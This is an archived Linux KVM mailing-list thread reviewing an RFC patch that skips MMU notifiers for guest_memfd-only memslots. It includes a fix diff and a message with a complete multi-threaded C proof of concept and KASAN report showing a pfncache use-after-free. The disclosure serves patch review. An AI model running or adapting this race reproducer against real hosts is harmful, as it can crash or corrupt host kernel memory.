* Re: [RFC PATCH] KVM: Ignore MMU notifiers for guest_memfd-only memslots
  2026-06-17 13:07     ` Alexandru Elisei
  2026-06-17 21:21       ` Sean Christopherson
@ 2026-06-17 21:22       ` Sean Christopherson
  1 sibling, 0 replies; 17+ messages in thread
From: Sean Christopherson @ 2026-06-17 21:22 UTC (permalink / raw)
  To: Alexandru Elisei; +Cc: sashiko-reviews, Marc Zyngier, kvm, kvmarm, Oliver Upton

On Wed, Jun 17, 2026, Alexandru Elisei wrote:
> Hi Sean,
> 
> Thanks for the reply. Just to make sure, once the bugs have been iron out,
> you're ok with this idea?

Yes, I'm more than ok with this idea.  The only reason I didn't push to do this
right away is that I completely missed it :-)

^ permalink raw reply	[flat|nested] 17+ messages in thread

* Re: [RFC PATCH] KVM: Ignore MMU notifiers for guest_memfd-only memslots
  2026-06-17 21:21       ` Sean Christopherson
@ 2026-06-18 10:19         ` Alexandru Elisei
  2026-06-23 23:41         ` Ackerley Tng
  1 sibling, 0 replies; 17+ messages in thread
From: Alexandru Elisei @ 2026-06-18 10:19 UTC (permalink / raw)
  To: Sean Christopherson
  Cc: sashiko-reviews, Marc Zyngier, kvm, kvmarm, Oliver Upton

Hi Sean,

On Wed, Jun 17, 2026 at 02:21:02PM -0700, Sean Christopherson wrote:
> On Wed, Jun 17, 2026, Alexandru Elisei wrote:
> > Hi Sean,
> > 
> > Thanks for the reply. Just to make sure, once the bugs have been iron out,
> > you're ok with this idea?
> > 
> > On Mon, Jun 15, 2026 at 10:47:14AM -0700, Sean Christopherson wrote:
> > > On Mon, Jun 15, 2026, sashiko-bot@kernel.org wrote:
> > > > > diff --git a/virt/kvm/kvm_main.c b/virt/kvm/kvm_main.c
> > > > > --- a/virt/kvm/kvm_main.c
> > > > > +++ b/virt/kvm/kvm_main.c
> > > > [ ... ]
> > > > > @@ -592,6 +592,10 @@ static __always_inline kvm_mn_ret_t kvm_handle_hva_range(struct kvm *kvm,
> > > > >  			unsigned long hva_start, hva_end;
> > > > >  
> > > > >  			slot = container_of(node, struct kvm_memory_slot, hva_node[slots->node_idx]);
> > > > > +
> > > > > +			if (kvm_slot_has_gmem(slot) && kvm_memslot_is_gmem_only(slot))
> > > > > +				continue;
> > > > > +
> > > > 
> > > > [Severity: Critical]
> > > > Does this change inadvertently introduce a regression in the pfncache retry
> > > > protocol?
> > > > 
> > > > Looking at the pfncache framework, it maps guest memory into kernel space and
> > > > explicitly drops the page reference after mapping it:
> > > > 
> > > > virt/kvm/pfncache.c:hva_to_pfn_retry() {
> > > >     ...
> > > >     kvm_release_page_clean(page);
> > > >     ...
> > > > }
> > > > 
> > > > It appears to rely entirely on KVM's MMU notifiers (kvm->mmu_invalidate_seq)
> > > > to invalidate the cache when the page is unmapped by the host.
> > > > 
> > > > If a VMM defines a guest_memfd-backed memslot with KVM_MEMSLOT_GMEM_ONLY
> > > > but still provides a valid anonymous user mapping as its userspace_addr,
> > > > could this regression lead to a use-after-free?
> > > 
> > > Sadly, yes.  To land this, we would need to first teach the gfn_to_pfn_cache code
> > > to be able to pull directly from guest_memfd.  I forget if anyone is working on
> > > that.
> > 
> > I've been trying to wrap my head around this, and I just can't seem to
> > figure it out.
> > 
> > kvm_mmu_notifier_invalidate_range_start(), before handle_hva_range(), calls
> > gfn_to_pfn_cache_invalidate_start() for the MMU notifier range, and that
> > marks all caches that overlap the range as invalid. kvm_gpc_check() returns
> > false for an invalid cache, so how can the memory still be accessed via the
> > pfncache?
> 
> That just forces gpcs to be refreshed, mmu_notifier_retry_cache() still relies
> on mmu_invalidate_seq being bumped to avoid consuming stale state.

Yes.

> 
> > > > By unmapping the anonymous memory, the host would trigger MMU notifiers, but
> > > > this new check skips the memslot. As a result, kvm->mmu_invalidate_seq
> > > > wouldn't increment, and KVM might retain a kernel mapping to a freed physical
> > > > page.
> > 
> > kvm->mmu_invalidate_seq is incremented in kvm_mmu_invalidate_end(), I don't see
> > how that is affected by skipping a memslot in handle_hva_range().
> 
> handle_hva_range() only invokes on_lock() if a memslot is found.  By skipping the
> memslot entirely, kvm_mmu_invalidate_{start,end}() won't be called and so
> mmu_invalidate_seq won't be bumped.

I see it now, for some reason I completely missed the part where
kvm_mmu_invalidate_{begin,end}() is called on ->lock() :( I was under the
impression that they are called directly from the
->invalidate_range_{start,end}() MMU notifier callbacks.

> 
> > > > Could this allow the guest to read or write arbitrary host physical memory?
> > 
> > The KVM_MEMSLOT_GMEM_ONLY flag is set if the backing guest_memfd has been
> > created with GUEST_MEMFD_FLAG_MMAP. The documentation for the flag says
> > that '[..] the fault will always be consumed from guest_memfd, regardless
> > of whether it is a shared or private fault'.  As far as I can tell, this
> > means that, absent a fallocate(FALLOC_FL_PUNCH_HOLE) call, the page is
> > still in the page cache for the guest_memfd file after userspace has
> > unmapped it, so the guest will not be accessing a freed page.
> 
> KVM_MEMSLOT_GMEM_ONLY is somewhat misleading, it only applies to the KVM's MMU.
> For other cases where KVM accesses guest memory, KVM still follows the host virtual
> address, e.g. so that copy_{to,from}_user() Just Works.  But userspace isn't
> strictly *required* to keep the userspace mapping coherent with guest_memfd, nor
> is userspace required to make the userspace mapping fully RWX.  And so if
> userspace modifies the VMA, KVM needs to react accordingly.
> 
> When in-place conversion comes along, KVM will also rely on userspace mappings
> being torn down before allow a SHARED page to become PRIVATE (for all intents
> and purposes, we're conceptually treating conversions as free()+re-alloc().  So
> while the page might still be in the page cache, it's effectively been "freed".
> So in that case, KVM really does need to ensure it handles mmu_notifier events
> correctly to avoid UAF.

Everything makes more sense now, thanks for your patience in explaining it.

Thanks,
Alex

^ permalink raw reply	[flat|nested] 17+ messages in thread

* Re: [RFC PATCH] KVM: Ignore MMU notifiers for guest_memfd-only memslots
  2026-06-15 18:09     ` Sean Christopherson
@ 2026-06-18 11:09       ` Alexandru Elisei
  0 siblings, 0 replies; 17+ messages in thread
From: Alexandru Elisei @ 2026-06-18 11:09 UTC (permalink / raw)
  To: Sean Christopherson
  Cc: sashiko-reviews, Marc Zyngier, kvm, kvmarm, Oliver Upton

Hi Sean,

On Mon, Jun 15, 2026 at 11:09:21AM -0700, Sean Christopherson wrote:
> On Mon, Jun 15, 2026, Sean Christopherson wrote:
> > On Mon, Jun 15, 2026, sashiko-bot@kernel.org wrote:
> > > > diff --git a/virt/kvm/kvm_main.c b/virt/kvm/kvm_main.c
> > > > --- a/virt/kvm/kvm_main.c
> > > > +++ b/virt/kvm/kvm_main.c
> > > [ ... ]
> > > > @@ -592,6 +592,10 @@ static __always_inline kvm_mn_ret_t kvm_handle_hva_range(struct kvm *kvm,
> > > >  			unsigned long hva_start, hva_end;
> > > >  
> > > >  			slot = container_of(node, struct kvm_memory_slot, hva_node[slots->node_idx]);
> > > > +
> > > > +			if (kvm_slot_has_gmem(slot) && kvm_memslot_is_gmem_only(slot))
> > > > +				continue;
> > > > +
> > > 
> > > [Severity: Critical]
> > > Does this change inadvertently introduce a regression in the pfncache retry
> > > protocol?
> > > 
> > > Looking at the pfncache framework, it maps guest memory into kernel space and
> > > explicitly drops the page reference after mapping it:
> > > 
> > > virt/kvm/pfncache.c:hva_to_pfn_retry() {
> > >     ...
> > >     kvm_release_page_clean(page);
> > >     ...
> > > }
> > > 
> > > It appears to rely entirely on KVM's MMU notifiers (kvm->mmu_invalidate_seq)
> > > to invalidate the cache when the page is unmapped by the host.
> > > 
> > > If a VMM defines a guest_memfd-backed memslot with KVM_MEMSLOT_GMEM_ONLY
> > > but still provides a valid anonymous user mapping as its userspace_addr,
> > > could this regression lead to a use-after-free?
> > 
> > Sadly, yes.  To land this, we would need to first teach the gfn_to_pfn_cache code
> > to be able to pull directly from guest_memfd.  I forget if anyone is working on
> > that.
> 
> Actually, we just need to ensure the invalidation tracking is updated, the MMU
> itself can be left as-is.
> 
> Compile tested only, but this?
> 
> diff --git a/include/linux/kvm_host.h b/include/linux/kvm_host.h
> index 27498e990dff..690ab707816b 100644
> --- a/include/linux/kvm_host.h
> +++ b/include/linux/kvm_host.h
> @@ -260,6 +260,7 @@ union kvm_mmu_notifier_arg {
>  enum kvm_gfn_range_filter {
>         KVM_FILTER_SHARED               = BIT(0),
>         KVM_FILTER_PRIVATE              = BIT(1),
> +       KVM_FILTER_USERSPACE_MAPPINGS   = BIT(2),
>  };
>  
>  struct kvm_gfn_range {
> diff --git a/virt/kvm/kvm_main.c b/virt/kvm/kvm_main.c
> index e44c20c04961..84b693de7e35 100644
> --- a/virt/kvm/kvm_main.c
> +++ b/virt/kvm/kvm_main.c
> @@ -608,7 +608,8 @@ static __always_inline kvm_mn_ret_t kvm_handle_hva_range(struct kvm *kvm,
>                          * HVA-based notifications aren't relevant to private
>                          * mappings as they don't have a userspace mapping.
>                          */
> -                       gfn_range.attr_filter = KVM_FILTER_SHARED;
> +                       gfn_range.attr_filter = KVM_FILTER_SHARED |
> +                                               KVM_FILTER_USERSPACE_MAPPINGS;
>  
>                         /*
>                          * {gfn(page) | page intersects with [hva_start, hva_end)} =
> @@ -715,6 +716,21 @@ void kvm_mmu_invalidate_range_add(struct kvm *kvm, gfn_t start, gfn_t end)
>  bool kvm_mmu_unmap_gfn_range(struct kvm *kvm, struct kvm_gfn_range *range)
>  {
>         kvm_mmu_invalidate_range_add(kvm, range->start, range->end);
> +
> +       /*
> +        * When reacting to changes in userspace mappings, don't unmap memslots
> +        * that are guest_memfd-only, in which case KVM's MMU mappings are
> +        * pulled directly from guest_memfd, i.e. don't depend on the userspace
> +        * mappings.
> +        *
> +        * TODO: Skip gmem-only memslots on mmu_notifier events entirely, once
> +        * gfn_to_pfn_cache is also wired up to directly pull from guest_memfd.
> +        */
> +       if (range->attr_filter & KVM_FILTER_USERSPACE_MAPPINGS &&
> +           kvm_slot_has_gmem(range->slot) &&
> +           kvm_memslot_is_gmem_only(range->slot))
> +               return false;
> +
>         return kvm_unmap_gfn_range(kvm, range);
>  }

Looks correct to me, this way we also make sure we don't hit the
WARN_ON_ONCE() from mmu_invalidate_retry_pfn().

How about the ->{clear_flush,clear,test}_young() MMU notifier callbacks?
Shouldn't they receive the same treatment?

Thanks,
Alex

^ permalink raw reply	[flat|nested] 17+ messages in thread

* Re: [RFC PATCH] KVM: Ignore MMU notifiers for guest_memfd-only memslots
  2026-06-15 17:47   ` Sean Christopherson
  2026-06-15 18:09     ` Sean Christopherson
  2026-06-17 13:07     ` Alexandru Elisei
@ 2026-06-18 11:26     ` David Hildenbrand (Arm)
  2 siblings, 0 replies; 17+ messages in thread
From: David Hildenbrand (Arm) @ 2026-06-18 11:26 UTC (permalink / raw)
  To: Sean Christopherson, sashiko-reviews
  Cc: Alexandru Elisei, Marc Zyngier, kvm, kvmarm, Oliver Upton

On 6/15/26 19:47, Sean Christopherson wrote:
> On Mon, Jun 15, 2026, sashiko-bot@kernel.org wrote:
>>> diff --git a/virt/kvm/kvm_main.c b/virt/kvm/kvm_main.c
>>> --- a/virt/kvm/kvm_main.c
>>> +++ b/virt/kvm/kvm_main.c
>> [ ... ]
>>> @@ -592,6 +592,10 @@ static __always_inline kvm_mn_ret_t kvm_handle_hva_range(struct kvm *kvm,
>>>  			unsigned long hva_start, hva_end;
>>>  
>>>  			slot = container_of(node, struct kvm_memory_slot, hva_node[slots->node_idx]);
>>> +
>>> +			if (kvm_slot_has_gmem(slot) && kvm_memslot_is_gmem_only(slot))
>>> +				continue;
>>> +
>>
>> [Severity: Critical]
>> Does this change inadvertently introduce a regression in the pfncache retry
>> protocol?
>>
>> Looking at the pfncache framework, it maps guest memory into kernel space and
>> explicitly drops the page reference after mapping it:
>>
>> virt/kvm/pfncache.c:hva_to_pfn_retry() {
>>     ...
>>     kvm_release_page_clean(page);
>>     ...
>> }
>>
>> It appears to rely entirely on KVM's MMU notifiers (kvm->mmu_invalidate_seq)
>> to invalidate the cache when the page is unmapped by the host.
>>
>> If a VMM defines a guest_memfd-backed memslot with KVM_MEMSLOT_GMEM_ONLY
>> but still provides a valid anonymous user mapping as its userspace_addr,
>> could this regression lead to a use-after-free?
> 
> Sadly, yes.  To land this, we would need to first teach the gfn_to_pfn_cache code
> to be able to pull directly from guest_memfd.  I forget if anyone is working on
> that.

For completeness, I think this is what you are looking for:

https://lore.kernel.org/r/20260420154720.29012-1-itazur@amazon.com

-- 
Cheers,

David

^ permalink raw reply	[flat|nested] 17+ messages in thread

* Re: [RFC PATCH] KVM: Ignore MMU notifiers for guest_memfd-only memslots
  2026-06-15 15:52 [RFC PATCH] KVM: Ignore MMU notifiers for guest_memfd-only memslots Alexandru Elisei
  2026-06-15 16:09 ` sashiko-bot
  2026-06-15 19:07 ` David Hildenbrand
@ 2026-06-21  0:02 ` XIAO WU
  2 siblings, 0 replies; 17+ messages in thread
From: XIAO WU @ 2026-06-21  0:02 UTC (permalink / raw)
  To: Alexandru Elisei, pbonzini, kvm, linux-kernel, maz, oupton,
	suzuki.poulose, kvmarm, linux-arm-kernel, seanjc,
	david.hildenbrand, mark.rutland

Hi

I came across the Sashiko review in this thread and wanted to see if
the pfncache UAF could be triggered in practice.  The short answer is:
yes, it reproduces reliably with a multi-threaded PoC.  Below is the
KASAN report and a brief description of the reproducer.

On Mon, Jun 15, 2026 at 04:52:44PM +0100, Alexandru Elisei wrote:
 > For guest_memfd-only memslots (kvm_memslot_is_gmem_only() is true), the
 > memory provider for the virtual machine is the guest_memfd file, not the
 > userspace mapping.
...
 > @@ -592,6 +592,10 @@ static __always_inline kvm_mn_ret_t 
kvm_handle_hva_range(struct kvm *kvm,
 >              unsigned long hva_start, hva_end;
 >
 >              slot = container_of(node, struct kvm_memory_slot, 
hva_node[slots->node_idx]);
 > +
 > +            if (kvm_slot_has_gmem(slot) && 
kvm_memslot_is_gmem_only(slot))
 > +                continue;
 > +

This `continue` is the problem.  When the only memslot covering the
HVA range is gmem-only, found_memslot stays false, and in
invalidate_range_end, kvm_mmu_invalidate_end() is never called.
That means mmu_invalidate_seq never increments.

Meanwhile, the pfncache (used for guest pvclock) runs this retry
protocol in hva_to_pfn_retry():

     1. Capture mmu_seq
     2. Drop gpc->lock
     3. GUP + kmap (gets a page reference, creates kernel mapping)
     4. kvm_release_page_clean(page) — drops the reference
     5. Re-acquire gpc->lock
     6. mmu_notifier_retry_cache() — checks if mmu_seq changed

If step 6 sees the same seq, the stale kmap is kept even though the
page was freed after step 4.  This is the UAF.

[Reproduction]

I rebuilt the kernel with CONFIG_KASAN=y and ran the PoC in a QEMU VM.
The trigger is three threads racing concurrently:

   - Thread 1 (T0): hammers KVM_RUN ioctls, forcing
     kvm_guest_time_update → kvm_gpc_refresh → hva_to_pfn_retry
   - Thread 2 (T1): cycles KVM_SET_MSRS to activate/deactivate the
     pvclock pfncache, extending the race window
   - Thread 3 (T2): hammers MADV_DONTNEED + write on the HVA, firing
     MMU notifier invalidations while the memslot is gmem-only

The full PoC source (poc.c) is attached at the end of this mail.
Compiled with: gcc -o poc poc.c -static -lpthread

[KASAN report — kernel 7.1.0-g0eb81d7f81ae #1, CONFIG_KASAN=y]

   ==================================================================
   BUG: KASAN: use-after-free in kvm_setup_guest_pvclock+0x632/0x680
   Read of size 4 at addr ffff888116069000 by task poc/9520

   CPU: 1 UID: 0 PID: 9520 Comm: poc Not tainted 7.1.0-g0eb81d7f81ae #1

   Call Trace:
    <TASK>
    dump_stack_lvl+0x116/0x1f0
    print_report+0xf4/0x600
    kasan_report+0xe0/0x110
    kvm_setup_guest_pvclock+0x632/0x680
    kvm_guest_time_update+0x741/0x1090
    vcpu_run+0x1c2a/0x5a80
    kvm_arch_vcpu_ioctl_run+0x1029/0x18d0
    kvm_vcpu_ioctl+0x772/0x1710
    __x64_sys_ioctl+0x193/0x210           ← KVM_RUN
    do_syscall_64+0x129/0x880
    entry_SYSCALL_64_after_hwframe+0x77/0x7f

   The buggy address belongs to the physical page:
   page: refcount:0 mapcount:0 mapping:0000000000000000 index:0x7ff24ab46

   page last allocated via:
    get_user_pages_unlocked → hva_to_pfn → __kvm_gpc_refresh
      → kvm_gpc_refresh → kvm_setup_guest_pvclock

   page last free pid 9520 tgid 9517 stack trace:
    kvm_release_page_clean → __folio_put → __free_frozen_pages
      ← __kvm_gpc_refresh ← kvm_gpc_refresh

The allocation and free traces confirm the exact scenario from the
review: the page is allocated by GUP during gpc refresh, then freed by
kvm_release_page_clean() inside the same __kvm_gpc_refresh() call,
and then kvm_setup_guest_pvclock still accesses it through the stale
kmap.

The crash reproduces within ~40 seconds of the PoC running.

[Full PoC source]

Compile: gcc -o poc poc.c -static -lpthread

// SPDX-License-Identifier: GPL-2.0-only
/*
  * PoC for: KVM MMU notifier skip regression for guest_memfd-only memslots
  *
  * Concurrent threads create a race between gpc refresh (GUP → kmap →
  * kvm_release_page_clean → retry check) and MMU invalidation (munmap /
  * MADV_DONTNEED) on a gmem-only memslot where the invalidation doesn't
  * increment mmu_invalidate_seq.
  */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <signal.h>
#include <stdint.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <pthread.h>
#include <linux/kvm.h>

#ifndef KVM_CAP_GUEST_MEMFD
#define KVM_CAP_GUEST_MEMFD 234
#endif
#ifndef GUEST_MEMFD_FLAG_MMAP
#define GUEST_MEMFD_FLAG_MMAP (1ULL << 0)
#endif
#ifndef MSR_KVM_SYSTEM_TIME_NEW
#define MSR_KVM_SYSTEM_TIME_NEW 0x4b564d01
#endif

#define PAGE_SIZE 4096

static volatile bool stop = false;
static int vcpu_fd = -1;
static unsigned long shared_hva = 0;

static void sigint_handler(int sig) { stop = true; }

static void *worker_thread(void *arg)
{
     int tid = (int)(long)arg;
     for (int i = 0; !stop && i < 200000; i++) {
         if (tid == 0)
             ioctl(vcpu_fd, KVM_RUN, 0);
         else if (tid == 1) {
             struct kvm_msrs *msrs = malloc(sizeof(*msrs) + 
sizeof(msrs->entries[0]));
             if (msrs) {
                 memset(msrs, 0, sizeof(*msrs) + sizeof(msrs->entries[0]));
                 msrs->nmsrs = 1;
                 msrs->entries[0].index = MSR_KVM_SYSTEM_TIME_NEW;
                 msrs->entries[0].data = (i & 1) ? 0x1001 : 0x1000;
                 ioctl(vcpu_fd, KVM_SET_MSRS, msrs);
                 free(msrs);
             }
         } else {
             madvise((void*)shared_hva, PAGE_SIZE, MADV_DONTNEED);
             *(volatile char*)shared_hva = 0x42;
         }
         if (i % 50000 == 0)
             printf("[T%d] %d iterations\n", tid, i);
     }
     printf("[T%d] Done\n", tid);
     return NULL;
}

int main(void)
{
     signal(SIGINT, sigint_handler);
     signal(SIGTERM, sigint_handler);

     int kvm_fd = open("/dev/kvm", O_RDWR);
     int vm_fd = ioctl(kvm_fd, KVM_CREATE_VM, 0);

     struct kvm_create_guest_memfd gmem_cmd = { .size = PAGE_SIZE, 
.flags = GUEST_MEMFD_FLAG_MMAP };
     int gmem_fd = ioctl(vm_fd, KVM_CREATE_GUEST_MEMFD, &gmem_cmd);

     void *anon = mmap(NULL, PAGE_SIZE, PROT_READ|PROT_WRITE,
                       MAP_PRIVATE|MAP_ANONYMOUS|MAP_POPULATE, -1, 0);
     memset(anon, 0xAA, PAGE_SIZE);
     shared_hva = (unsigned long)anon;

     struct kvm_userspace_memory_region2 mem = {
         .slot = 0, .flags = KVM_MEM_GUEST_MEMFD,
         .guest_phys_addr = 0x1000, .memory_size = PAGE_SIZE,
         .userspace_addr = shared_hva,
         .guest_memfd_offset = 0, .guest_memfd = gmem_fd,
     };
     ioctl(vm_fd, KVM_SET_USER_MEMORY_REGION2, &mem);

     vcpu_fd = ioctl(vm_fd, KVM_CREATE_VCPU, 0);
     size_t mmap_size = ioctl(kvm_fd, KVM_GET_VCPU_MMAP_SIZE, 0);
     struct kvm_run *vcpu_run = mmap(NULL, mmap_size, PROT_READ|PROT_WRITE,
                                     MAP_SHARED, vcpu_fd, 0);

     /* Pre-activate pfncache via MSR */
     struct kvm_msrs *msrs = malloc(sizeof(*msrs) + 
sizeof(msrs->entries[0]));
     memset(msrs, 0, sizeof(*msrs) + sizeof(msrs->entries[0]));
     msrs->nmsrs = 1;
     msrs->entries[0].index = MSR_KVM_SYSTEM_TIME_NEW;
     msrs->entries[0].data = 0x1001;
     ioctl(vcpu_fd, KVM_SET_MSRS, msrs);
     free(msrs);

     pthread_t threads[3];
     for (int i = 0; i < 3; i++)
         pthread_create(&threads[i], NULL, worker_thread, (void *)(long)i);

     sleep(40);
     stop = true;
     for (int i = 0; i < 3; i++)
         pthread_join(threads[i], NULL);

     printf("[*] Done. Check dmesg for KASAN UAF.\n");
     return 0;
}

Thanks,
XIAOWU



^ permalink raw reply	[flat|nested] 17+ messages in thread

* Re: [RFC PATCH] KVM: Ignore MMU notifiers for guest_memfd-only memslots
  2026-06-17 21:21       ` Sean Christopherson
  2026-06-18 10:19         ` Alexandru Elisei
@ 2026-06-23 23:41         ` Ackerley Tng
  2026-06-24 17:32           ` Sean Christopherson
  1 sibling, 1 reply; 17+ messages in thread
From: Ackerley Tng @ 2026-06-23 23:41 UTC (permalink / raw)
  To: Sean Christopherson, Alexandru Elisei
  Cc: sashiko-reviews, Marc Zyngier, kvm, kvmarm, Oliver Upton

Sean Christopherson <seanjc@google.com> writes:

>
> [...snip...]
>
>>
>> The KVM_MEMSLOT_GMEM_ONLY flag is set if the backing guest_memfd has been
>> created with GUEST_MEMFD_FLAG_MMAP. The documentation for the flag says
>> that '[..] the fault will always be consumed from guest_memfd, regardless
>> of whether it is a shared or private fault'.  As far as I can tell, this
>> means that, absent a fallocate(FALLOC_FL_PUNCH_HOLE) call, the page is
>> still in the page cache for the guest_memfd file after userspace has
>> unmapped it, so the guest will not be accessing a freed page.
>
> KVM_MEMSLOT_GMEM_ONLY is somewhat misleading, it only applies to the KVM's MMU.
> For other cases where KVM accesses guest memory, KVM still follows the host virtual
> address, e.g. so that copy_{to,from}_user() Just Works.  But userspace isn't
> strictly *required* to keep the userspace mapping coherent with guest_memfd, nor
> is userspace required to make the userspace mapping fully RWX.  And so if
> userspace modifies the VMA, KVM needs to react accordingly.
>
> When in-place conversion comes along, KVM will also rely on userspace mappings
> being torn down before allow a SHARED page to become PRIVATE (for all intents

Conversions explicitly unmaps the pages being converted from userspace
page tables, then checks for users other than guest_memfd. Unmapping
does invoke the MMU notifier stuff, but conversions doesn't rely on MMU
notifiers to unmap from stage 2 page tables, since conversions directly
calls kvm_gmem_invalidate_start().

On a shared to private conversion, if the page was mapped in stage 2
page tables, we'd have tried to unmap it twice (the second time doesn't
actually unmap, but still tells guest vCPUs trying to fault to retry.

So we're good! With this, the first unmap will notify through MMU
notifiers but actually do no unmapping. Thank you for working on this!

> and purposes, we're conceptually treating conversions as free()+re-alloc().  So
> while the page might still be in the page cache, it's effectively been "freed".
> So in that case, KVM really does need to ensure it handles mmu_notifier events
> correctly to avoid UAF.

Just making sure: "handle mmu_notifier events" here refers to
gfn_to_pfn_cache and other parts of KVM that works with memory. There's
no issue with a UAF between mmu_notifier invalidations and conversions,
right?

^ permalink raw reply	[flat|nested] 17+ messages in thread

* Re: [RFC PATCH] KVM: Ignore MMU notifiers for guest_memfd-only memslots
  2026-06-23 23:41         ` Ackerley Tng
@ 2026-06-24 17:32           ` Sean Christopherson
  0 siblings, 0 replies; 17+ messages in thread
From: Sean Christopherson @ 2026-06-24 17:32 UTC (permalink / raw)
  To: Ackerley Tng
  Cc: Alexandru Elisei, sashiko-reviews, Marc Zyngier, kvm, kvmarm,
	Oliver Upton

On Tue, Jun 23, 2026, Ackerley Tng wrote:
> Sean Christopherson <seanjc@google.com> writes:
> > and purposes, we're conceptually treating conversions as free()+re-alloc().  So
> > while the page might still be in the page cache, it's effectively been "freed".
> > So in that case, KVM really does need to ensure it handles mmu_notifier events
> > correctly to avoid UAF.
> 
> Just making sure: "handle mmu_notifier events" here refers to
> gfn_to_pfn_cache and other parts of KVM that works with memory.

Yes. 

> There's no issue with a UAF between mmu_notifier invalidations and
> conversions, right?

Right.

^ permalink raw reply	[flat|nested] 17+ messages in thread

end of thread, other threads:[~2026-06-24 17:32 UTC | newest]

Thread overview: 17+ messages (download: mbox.gz follow: Atom feed
-- links below jump to the message on this page --
2026-06-15 15:52 [RFC PATCH] KVM: Ignore MMU notifiers for guest_memfd-only memslots Alexandru Elisei
2026-06-15 16:09 ` sashiko-bot
2026-06-15 17:47   ` Sean Christopherson
2026-06-15 18:09     ` Sean Christopherson
2026-06-18 11:09       ` Alexandru Elisei
2026-06-17 13:07     ` Alexandru Elisei
2026-06-17 21:21       ` Sean Christopherson
2026-06-18 10:19         ` Alexandru Elisei
2026-06-23 23:41         ` Ackerley Tng
2026-06-24 17:32           ` Sean Christopherson
2026-06-17 21:22       ` Sean Christopherson
2026-06-18 11:26     ` David Hildenbrand (Arm)
2026-06-15 19:07 ` David Hildenbrand
2026-06-17 13:23   ` Alexandru Elisei
2026-06-17 13:41     ` David Hildenbrand
2026-06-17 13:50       ` Alexandru Elisei
2026-06-21  0:02 ` XIAO WU

This is an external index of several public inboxes,
see mirroring instructions on how to clone and mirror
all data and code used by this external index.